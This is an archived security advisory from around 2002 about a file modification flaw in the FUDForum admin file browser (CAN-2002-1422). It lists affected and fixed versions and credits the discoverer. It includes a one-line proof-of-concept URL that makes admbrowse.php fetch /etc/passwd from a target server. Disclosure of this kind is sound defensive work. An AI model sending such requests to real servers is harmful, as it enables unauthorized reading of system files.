exploits , vulnerabilities , articles , Ilia Alshanetsky FUDForum File Modification Vulnerability

Title	Ilia Alshanetsky FUDForum File Modification Vulnerability
Published	2002-08-19-12:00AM
Updated	2002-08-19-10:39PM
Class	Design Error
CVE	CAN-2002-1422
Remote	Yes
Local	No
Credit	Discovery credited to Ulf Harnhammar <ulfh@update.uu.se>.
Vulnerable	Ilia Alshanetsky FUDForum 2.0.2 Ilia Alshanetsky FUDForum 1.9.8 Ilia Alshanetsky FUDForum 1.2.8
Not Vulnerable	Ilia Alshanetsky FUDForum 2.2.3 Ilia Alshanetsky FUDForum 2.2 .0
Code	The following proof of concept was provided by Ulf Harnhammar <ulfh@update.uu.se>: http://victim.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:53:59 +0000